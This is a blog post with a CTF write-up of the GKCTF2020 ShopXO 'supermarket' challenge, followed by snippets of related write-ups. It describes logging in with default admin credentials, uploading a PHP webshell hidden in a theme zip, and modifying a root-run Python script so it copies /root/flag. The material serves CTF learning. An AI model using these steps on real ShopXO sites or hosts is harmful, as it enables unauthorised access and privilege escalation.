2020/7/21 - [GKCTF2020]老八小超市 - 弱密码、木马上传、间接非正常提权

最新推荐文章于 2024-11-28 20:51:36 发布
最新推荐文章于 2024-11-28 20:51:36 发布
阅读量367 收藏 1
点赞数
分类专栏: CTF 文章标签: php一句话 shopxo
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zhangxiansheng12/article/details/107499612
版权

这是个简单的实体环境了,这个弱密码起到了很大的作用

文章目录

1.弱密码

shopxo管理员好像有两个,一个是admin(超级管理员),另一个是shopxo(一般管理员),他们的密码都是shopxo,一句话,弱密码真恶心。

2.下载主题

在这里插入图片描述
下载第一个默认主题,不要钱的直接下。

3.上传木马

搞个一句话
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
安装主题,当主题转为1.8.1就安装成功了,我们的一句话也就上传成功了。

4.连接木马

由此推测我们的一句话上传到的位置为

http://d6f0faff-ce46-4d6f-a68f-47bc8e89f43b.node3.buuoj.cn/public/static/index/default/h4ck.php

测试后发现可以访问,那我们就也能连接啦!
在这里插入图片描述
在这里插入图片描述

连接成功,发现了flag是假的flag,真的flag在root目录下,但是没权限搞不进去
在这里插入图片描述

hint没啥搞头,看auto.sh内容

#!/bin/sh
while true; do (python /var/mail/makeflaghint.py &) && sleep 60; done

每60秒运行一次makeflaghint.py,看py脚本的内容为

import os
import io
import time
os.system("whoami")
gk1=str(time.ctime())
gk="\nGet The RooT,The Date Is Useful!"
f=io.open("/flag.hint", "rb+")
f.write(str(gk1))
f.write(str(gk))
f.close()

改一下就ok啦。 我还没学对文件的操作。这里就先抄一下别人的。

import os
import io
import time
os.system("whoami")
gk1=str(time.ctime())
gk="\nGet The RooT,The Date Is Useful!"
f=io.open("/flag.hint", "rb+")

s = open("/root/flag","r").read()
f.write(s)

f.write(str(gk1))
f.write(str(gk))
f.close()

在这里插入图片描述
获得flag。

[GKCTF2020]超市-wp
freerats的博客
06-07 1298
这道题本就是基于shopxo已有的漏洞,解题思路也就基于此漏洞,若开始对此漏洞无了解,那就比较难顶了 打开题目,就是购物主页。 如果有了解shopxo,就知道默认后台就是admin.php, 登入的默认账号密码是admin和shopxo。 然后就进入到了网站后台 接下来就在应用中心里的应用商店找到主题,然后下载默认主题 因为后面应用主题的时候需要我们重新把下载的这个压缩包传上去,那我们就可以把句话写入压缩包,给他起传上去。 我们可以在_static_里面加上个test.php,这里面就是我们加入
GKCTF2020_web
ChenZIDu的博客
05-25 811
不完整,先把打出来的题目写下,再写复现的好了 CheckIN 源码 <title>Check_In</title> <?php highlight_file(__FILE__); class ClassName { public $code = null; public $decode = null; function __construct() { $this->cod
[GKCTF2020]超市
末初 - mochu7
06-17 1038
题目地址 性感菜鸡在线搜索漏洞,找到篇这个:渗透测试|shopxo后台全版本获取shell复现 后台管理地址:/admin.php?s=/admin/logininfo.html 默认账号密码登录即可:admin/shopxo 下载好主题之后,在这个位置添加我们的句话马儿 然后把这个主题上传到网站进行安装 安装完成之后,选择这个主题,然后访问路径:/public/static/index/lengyu/shell.php 上蚁剑 /flag是假的,但是有线索,示说真正的flag的在/ro
微信小程序--旋转木马/缩放轮播图效果
03-29
微信小程序原生Swiper控件 Wxss Transform、Transition 轮播条滚动回调控制 微信小程序条件渲染、列表渲染 全部实现代码加起来也就三四十行,大部分还用来写wxml UI代码,所以功能实现起来非常简单。  首先将问题...
GKCTF2020 - Web(超市儿)
ximo的博客
03-17 272
[GKCTF2020]超市儿 基于shopxo开源系统的题目,默认登录后台为admin.php。 账号:admin 密码:shopxo 在这个页面上传zip文件,给了下载链接。 在zip文件的\default\_static_目录下上传木马文件: 上传,访问php文件(/public/static/index/default/ctf.php): 使用蚁剑进行连接: 在跟目录下存在flag,但是是个假的。 还有个flag.hint文件: 获得root?,说明flag在root目录下,但是没有
[原创]K8句话密码爆破工具{秒破10万} 支持ASP/PHP/ASPX/JSP/CFM/DIY-附件资源
03-02
[原创]K8句话密码爆破工具{秒破10万} 支持ASP/PHP/ASPX/JSP/CFM/DIY-附件资源
HSS针对官方披露漏洞的修复建议-SaltStack远程命令执行漏洞(CVE-2020-11651/CVE-2020-11652)
最新发布
2403_89345625的博客
11-28 443
近日,华为云关注到国外安全研究人员披露SaltStack存在两个严重的安全漏洞。Saltstack是基于python开发的套C/S自动化运维工具,此次被爆当中存在身份验证绕过漏洞(CVE-2020-11651)和目录遍历漏洞(CVE-2020-11652),攻击者利用漏洞可实现远程命令执行、读取服务器上任意文件、获取敏感信息等。华为云醒使用SaltStack的用户尽快安排自检并做好安全加固。
GKCTF2020web
conelly的博客
03-26 382
[GKCTF2020]cve版签到 PHP 7.2.29之前的7.2.x版本、7.3.16之前的7.3.x版本和7.4.4之前的7.4.x版本中的‘get_headers()’函数存在安全漏洞。如果URL包含零(\ 0)字符,则 URL将被静默地截断。 这可能会导致某些软件对get_headers()的目标做出错误的假设,并可能将某些信息发送到错误的服务器。 先访问本地主机,用%00截断 /?url=http://127.0.0.1%00www.ctfhub.com 示要以123结尾 /?url=h
2020最全弱口令常用口令大集合
09-26
2020最新的弱口令大集合,从top100,1000到top100000的密码,以及常见的从3位起到10位的弱口令,还有姓名拼音等多个弱口令字典,各种撞库等,数字亲测好用,大家快来下载吧,挺不错的个资源哦!!
弱口令字典(2W+条,无重复)
05-26
比较全的弱口令字典,大概两万四千条,没有重复的。
shopex修改后台管理密码
11-01
修改密码SHOPEX修改后台密码的文件文本,改成PHP格式即可
GKCTF web-超市儿 解题思路writeup
qq_41743240的博客
05-24 1210
打开题目 看就知道是个CMS,我们试着搜索ShopXO企业级免费开源商城系统的漏洞,可以知道个后台的文件上传漏洞 利用方法链接 http://www.nctry.com/1660.html 之后查看flag,会发现是假的,但从中可以知道真实flag在root目录下,访问root目录没有限 查看根目录的flag.hint可以知道个线索: Sun May 24 07:51:26 2020 Get The RooT,The Date Is Useful! 然后查看根目录的auto.sh可
2021-02-24
m0_53314778的博客
02-24 624
[GKCTF2020]超市儿 知识点 shopxo后台全版本获取shell 搜索能力 渗透测试|shopxo后台全版本获取shell复现 启动靶机: 看就知道是个CMS,我们试着搜索ShopXO企业级免费开源商城系统的漏洞,可以知道个后台的文件上传漏洞 知道了默认后台地址以及账号和密码:/admin.php | admin:shopxo 成功进入后台 左侧找到安装主题功能,然后到shopxo官网下载个官方的主题模板,摸了下主题模板的结构后发现可以把马插在压缩包的/主题名/_stati
部分WP-GKCTF2020
~airrudder~
05-24 6382
本篇内容 MISC: [GKCTF2020]签到 [GKCTF2020]Pokémon [GKCTF2020]问卷调查 [GKCTF2020]code obfuscation Crypto: [GKCTF2020]小学生的密码学 [GKCTF2020]汉字的秘密 [GKCTF2020]babycrypto Web: [GKCTF2020]CheckIN [GKCTF2020]超市儿 Reverse: [GKCTF2020]Check_1n 上篇 | 目录 | 下篇 [GKC.
buu-web刷题
qq_46540840的博客
11-06 247
GKCTF2020复现 备赛刷题 CheckIN 首先源码 <title>Check_In</title> <?php highlight_file(__FILE__); class ClassName { public $code = null; public $decode = null; function __construct() { $this->code =
BUUCTF 35
qq_52431855的博客
03-02 668
知识点 ShopXO企业级免费开源商城系统的漏洞(参考链接) SSTI模板注入 模板注入的些特性(常见的注入可以用下图的方法进行测试。) 35-1[GKCTF2020]超市儿 做题思路 开始毫无头绪,寻找WP,发现利用shopxo已有的漏洞, 利用方法链接 http://www.nctry.com/1660.html 默认后台admin.php默认账号密码是admin和shopxo 成功进入后台 接下来就在应用中心里的应用商店找到主题,然后下载默认..
渗透测试|shopXO后台全版本获取Shell复现
qq_45521281的博客
05-29 6669
shopxo款开源的企业级商城系统,基于thinkphp5框架开发。这几天做了“[GKCTF2020]超市儿”这道题,学到了后台获取shell的个技巧,所以在这里复现下。 个搜索语法:title=“ShopXO企业级B2C电商系统供商”(不要干坏事哦) 渗透测试复现 页面来自buuctf——[GKCTF2020]超市儿。ShopXO全版本getshell流程走起: 进入题目(网上随便可以通过搜索找到个使用shopxo搭建的演示站) 别的漏洞没找到,尝试访问默认登陆后台,后台页
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

抒情诗、

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值